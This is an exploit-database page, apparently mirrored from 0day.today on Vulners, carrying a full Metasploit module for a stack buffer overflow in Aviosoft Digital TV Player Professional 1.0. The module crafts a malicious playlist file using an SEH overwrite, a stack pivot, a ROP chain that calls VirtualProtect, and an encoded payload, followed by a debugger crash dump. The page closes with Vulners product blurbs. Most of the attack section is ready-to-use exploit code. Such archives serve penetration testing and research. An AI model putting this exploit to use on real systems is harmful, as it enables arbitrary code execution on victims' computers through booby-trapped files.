Lucene search
K

Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow

🗓️ 12 Nov 2011 00:00:00Reported by metasploitType 
zdt
 zdt
🔗 0day.today👁 15 Views

Aviosoft Digital TV Player Pro 1.0 Stack Buffer Overflo

Code
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking
 
    include Msf::Exploit::FILEFORMAT
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
            'Description'    => %q{
                        This module exploits a vulnerability found in Aviosoft Digital TV Player
                    Pro version 1.x.  An overflow occurs when the process copies the content of a
                    playlist file on to the stack, which may result aribitrary code execution under
                    the context of the user.
                },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'modpr0be',  #Initial discovery, poc
                    'sinn3r',    #Metasploit
                ],
            'References'     =>
                [
                    ['OSVDB', '77043'],
                    ['URL', 'http://www.exploit-db.com/exploits/18096/'],
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00\x0a\x1a",
                    'StackAdjustment' => -3500,
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "seh",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Aviosoft DTV Player 1.0.1.2',
                        {
                            'Ret'    => 0x6130534a,  #Stack pivot (ADD ESP,800; RET)
                            'Offset' => 612,         #Offset to SEH
                            'Max'    => 5000         #Max buffer size
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Nov 9 2011",
            'DefaultTarget'  => 0))
 
            register_options(
                [
                    OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])
                ], self.class)
    end
 
    def junk(n=1)
        return [rand_text_alpha(4).unpack("L")[0]] * n
    end
 
    def nops(rop=false, n=1)
        return rop ? [0x61326003] * n : [0x90909090] * n
    end
 
    def exploit
        rop = [
            nops(true, 10),  #ROP NOP
            0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)
            0x10011108,      #ptr to &VirtualProtect
            0x64010503,      #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)
            junk,
            0x6160949f,      #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)
            junk(3),
            0x61604218,      #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)
            junk(3),
            0x6403d1a6,      #POP EBP # RETN (MediaPlayerCtrl.dll)
            junk(3),
            0x60333560,      #& push esp #  ret 0c (Configuration.dll)
            0x61323EA8,      #POP EAX # RETN (DTVDeviceManager.dll)
            0xA13977DF,      #0x00000343-> ebx
            0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
            0x6163d37b,      #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)
            0x61626807,      #XOR EAX,EAX # RETN (EPG.dll)
            0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
            0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)
            0xA13974DC,      #0x00000040-> edx
            0x613107fb,      #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)
            0x60326803,      #POP ECX # RETN (Configuration.dll)
            0x60350340,      #&Writable location
            0x61329e07,      #POP EDI # RETN (DTVDeviceManager.dll)
            nops(true),      #ROP NOP
            0x60340178,      #POP EAX # RETN
            nops,            #Regular NOPs
            0x60322e02       #PUSH # RETN
        ].flatten.pack("V*")
 
        buf  = ''
        buf << rand_text_alpha(target['Offset']-buf.length)
        buf << [target.ret].pack('V*')
        buf << rand_text_alpha(136)
        buf << rop
        buf << make_nops(32)
        buf << payload.encoded
        buf << rand_text_alpha(target['Max']-buf.length)
 
        file_create(buf)
    end
end
 
=begin
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
MediaPlayerCtrl!DllCreateObject+0x220:
6400f6f0 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -
DTVDeviceManager+534a (6130534a)
Invalid exception stack at 41414141
0:000> !address edi
    00130000 : 00130000 - 00003000
                    Type     00040000 MEM_MAPPED
                    Protect  00000002 PAGE_READONLY
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageIsVAD
0:000> !address esi
    047a0000 : 047a0000 - 0000b000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   013c0000
=end



#  0day.today [2018-02-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation